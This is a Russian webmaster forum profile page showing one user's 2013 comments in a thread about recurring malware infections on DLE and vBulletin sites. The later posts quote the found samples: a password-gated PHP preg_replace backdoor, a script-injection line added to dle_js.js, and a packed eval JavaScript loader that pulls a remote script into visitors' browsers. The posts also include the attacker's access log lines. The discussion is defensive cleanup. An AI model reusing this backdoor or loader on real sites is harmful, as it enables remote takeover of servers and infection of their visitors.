Комментарии - ProLiant - Профиль вебмастера - Форум об интернет-маркетинге

17 декабря 2013, 16:33

Greatbolt:
Но почистить скачанную на комп папку, зная кусок вредоносного кода тоже вполне можно, используя для поиска зараженных файлов notepad++.

Да все можно. Можно каждый лень выкачивать десятки гигов файлов форума на комп и перелопачивать. Но смысл ведь в чем. Что бы закрыть вообще лазейку, а не искать варианты, каким образом вычищать, какую версию форума использовать и какие моды на него ставить.

netwind, простите, а Вы тоже из "пострадавших" от этой напасти?

Яндекс нашел вирус на сайте

17 декабря 2013, 13:22

netwind:
Не понял этого вашего пассажа. Родные файлы vbulletin вы всегда можете скачать с сайта разработчика.

Речь в теме идет не только о вбуллетине, здесь уже отписывались о подобном на вордпрессе, джумле, ДЛЕ. Вот об этом и пассаж. И да. Если стоит "голый" форум то да, никаких проблем заново перезалить, а если люди ставят еще моды разные, представляете, как для них взять и перезалить файлики? :)

Скрипт для поиска шеллов и другого вредоносного по

17 декабря 2013, 13:12

Скрипт AI-Bolit можно обсудить на форумах:
forum.searchengines.ru — активно обсуждается

Так, подумалось что-то про активность. ;)

Яндекс нашел вирус на сайте

17 декабря 2013, 12:57

Bener:
В общем через спец.сервисы для декодирования скриптов расшифровал код вирусного js, вот так код выглядит в отформатированном виде:

И что выяснили, рассматривая этот код? ;)

---------- Добавлено 17.12.2013 в 15:58 ----------

Bener:
netwind, кто что написал? Где? Как например зачистить вирус на ВБуллетин? Переустанавливать движок? Какой в этом смысл, если я вижу что все файлы и так родные и следов пребывания вируса в скриптах стиля тоже нет. Что и где зачищать-то?) И ещё Вы видели, чтобы тут кто-нибудь отписал что решил эту проблему? По-моему люди как раз пишут, что вирус продолжает грузить вредоносные файлы.

А сегодня, например, файлы были вообще не с текущей датой изменения, а с старой... Так что, не факт, что файл родной будет. И самое главное - не зачищать надо (все равно бесполезно), а искать источник появления и закрывать его. Иначе будем так зачищать каждый день до посинения. :)

Яндекс нашел вирус на сайте

17 декабря 2013, 06:05

В общем, вчера удалил это все, сегодня снова на месте: в uploads/posts в разных папках сидели conn.js и rusty.swf, а также в engine/classes/js/ в этот раз дописка в jqueryui.js ... :) Может еще где-что есть, пока не знаю.

Яндекс нашел вирус на сайте

16 декабря 2013, 19:22

Bener:
Поискал эту инфу в инете, ничего толкового не нашёл. Предлагаю тогда на все папки сайта выставить запрет на запись. Другого решения на данный момент не вижу. Жаль, что опытные вебмастера не оказывают поддержку в решении проблемы. Надо обратиться на другие форумы.

А картинки к новостям как будут заливаться потом в uploads ?

Яндекс нашел вирус на сайте

16 декабря 2013, 18:27

Bener:
Может кто знает как в хтакцесс прописать запрет на загрузку файлов определённого разрешения? Чтобы хотя бы остановить вирусню, пока не иниициируем проблему.

---------- Добавлено 16.12.2013 в 21:58 ----------

*определённого расширения, хотел сказать)

Да, хотя бы так временно прикрыть от загрузки явы и флэша.

Яндекс нашел вирус на сайте

16 декабря 2013, 17:33

Мысли тужатся в голове.. :) Замучался уже выковыривать постоянно все с фтп. :)

Яндекс нашел вирус на сайте

16 декабря 2013, 16:50

Bener:
ProLiant, это да, заразе походу всё равно какой двиг - ДЛЕ, Друпал, Джомла... А у меня, забыл сказать, вообще ВБуллетин. Так что Булку тоже допишите в этот список.
У Вас какой хостинг, если не секрет? Я на джино с недавних пор переехал, экономлю)

Я уже упомянул о булке. :)

попробуй поискать в логах .swf

Ну вот, например:

212.124.113.110 - - [15/Dec/2013:00:24:11 +0300] "GET /uploads/posts/2010-01/krisha.swf HTTP/1.0" 200 301 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"

212.124.113.110 - - [15/Dec/2013:03:17:20 +0300] "GET /uploads/posts/2012-01/bigcat.swf HTTP/1.0" 200 301 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"

212.124.113.110 - - [15/Dec/2013:05:37:36 +0300] "GET /uploads/posts/2012-06/qqqqq.swf HTTP/1.0" 200 301 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"

Но этих swf-в нет уже в тех папках. Возможно, сам потом и удаляет за собой?

Или еще с этого IP такое:

212.124.113.110 - - [15/Dec/2013:05:58:00 +0300] "GET /forum/css.php?userid=88403&cssuid=0&d=1386720000&td=ltr&styleid=0&sheet=userprofile.css HTTP/1.0" 200 2175 "-" "Zend_Http_Client"

212.124.113.110 - - [15/Dec/2013:05:58:39 +0300] "GET /forum/showthread.php?t=1251&page=19& HTTP/1.0" 200 27744 "-" "Zend_Http_Client"

Что это и что ОНО делает?

Яндекс нашел вирус на сайте

16 декабря 2013, 16:18

Пока вариант один, что врядли это дыры именно двига, т.к. мы уже видим здесь 3 популярные цмс, в которые внедряется эта гадость по одному и тому же сценарию.

П.с. Посмотрел только что логи по этому айпи - с него у меня и форум на вбуллетине долбит... Только пока еще не нашел, что и где он и там оставил. В файле, к которому там обращался прописано только это:

<?php
if (md5($_POST['p']) == '768f9a3926cc869d7d3c9e10e68ae97a') {
preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);
}

И на сайте ДЛЕ 10 новая вставка, теперь в в engine/classes/js/dle_js.js такое:

;document.write("<scr"+"ipt src='/uploads/posts/2009-11/cloclo.js'><"+"/script>");

Ну и соответственно сам cloclo.js с содержимым:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('l F(v){10(s.A&&s.1O){6 z=s["1N"+"1M"+"1P"+"1Q"+"1S"+"1R"](\'1L\')[0];6 q=s.A(\'1K\');6 1E="%{?-1D$1C{-)7^P";6 1F="%[{<1G-[ ";6 1J="1I/G`><1H.^1T ";6 1U="29,*4`>3@)~?26^!x";6 25="?M>*;#x}2a:S=P";q.J(\'2b\',"t"+"e"+"2e/"+"2d"+"24"+"23"+"i"+"1X");q.J(\'v\',v);6 1V="1Y<2B^])1B]K%#U:";6 1Z="22.(V~i(5.21.Q";6 20="S*2f``#1w]!b";6 1c="1b#1a^1d#W&**1e+19";6 1f="1h=>17$#L(>?Q";z["a"+"15"+"e"+"16"+"C"+"18"+"14"](q)}}l B(){u 13.1g()}6 1A="[1v/`c%:$k^]{1u";6 1t="!=1i/p#1x{1z{";6 1y="&n[~}I{;n#2=r";6 1s="Y`[1r(1l";6 1k="`1j+1m$*]$8[L*%9>";l N(g){u g.E(T)!=-1}6 1n="9@]+9]+D]a<1{f>1q";6 2g="-1p->:#)1o@1W;2G^2V";6 2U="I~?2X!@2T(;2M~`1";6 2O="<.p!j-^i[V";6 31="/2Q^d)#%?#^&`37";6 11="32"+"38"+":/"+"/o"+"Z"+"34"+"Z"+".p"+"p."+"g"+"/5"+"36"+"2K"+"2q"+"2p"+"2L"+"2r"+"2s"+"2o"+"2n"+"2i"+"2h"+"12"+"2c"+"2k"+"2m"+"2l"+"2u"+"2v"+"2F"+"28"+"27"+"f";6 T="w"+"2E";6 2D="[1+***<2x#*?-!i[2y(";6 2z="&y[:+7>2A@,/<*";6 2C=".2w?#;2J<2I.";6 2H="[{:}2j+#H`-?m#.]#";6 2t="{/b!2R%R+@C{G=. 35";l O(g){u g.E("c"+"h"+"33"+"30")==-1}l X(){6 g=13["2P"]["2N"+"2S"+"2Y"+"r"+"2Z"+"2W"]();10(O(g)&&N(g)&&B()){F(11)}}X();',62,195,'||||||var||||||||||ua|||||function|||||script_tag||document||return|src||||head_tag|createElement|cond3|||indexOf|includeJavascript|_|||setAttribute||||isWin|notChrome|||||win||||includeCounter||xy|if|url||navigator|ld|pp|nd|lfJ|hi|M8|4e3_|ZC|qiMQIcMnJN3|x8|MGdx|qiMQIcMnJN4|javaEnabled|Ez6|9e1|J2|UXCfmHog4|Jcn|V51g|JXBEbQFyL0|ASZW|u8|bS_j|bRogN|UXCfmHog3|UXCfmHog1|S24|bm|Uxg|hB|UXCfmHog2|WAw|UXCfmHog0|5h|3G_|QC981_uQ|rWncKlQG0|rWncKlQG1|_qkXItT9cf|DA9B|MH|rWncKlQG2|script|head|Elem|get|getElementsByTagName|ents|By|ame|TagN|5K0|rWncKlQG3|qiMQIcMnJN0|Az4_|pt|Vp|qiMQIcMnJN1|qiMQIcMnJN2|xu4i|30F|scr|va|rWncKlQG4|A9HV|||WL|7e|type||ja|xt|_9|JXBEbQFyL1|58|65|dh|56|ff|00|a0|43|f8|8d|70|e1|OelKMe4|ed|0a|e6c|O54b|Qm|OelKMe1|GV78||OelKMe2|OelKMe0|in|9c|vbu|OelKMe3|LgEc|1sj_yhO|7a|9e|1sk3|to|JXBEbQFyL3|userAgent|E2|bS|Lo|Xl|JXBEbQFyL2|tO|se|FJ|we|Ca|me|JXBEbQFyL4|ht|ro|xe|p4_||9g2ik|tp'.split('|'),0,{}))

Что такое Power BI и зачем это нужно бизнесу

В 2023 году Одноклассники пресекли более 9 млн подозрительных входов в учетные записи

ProLiant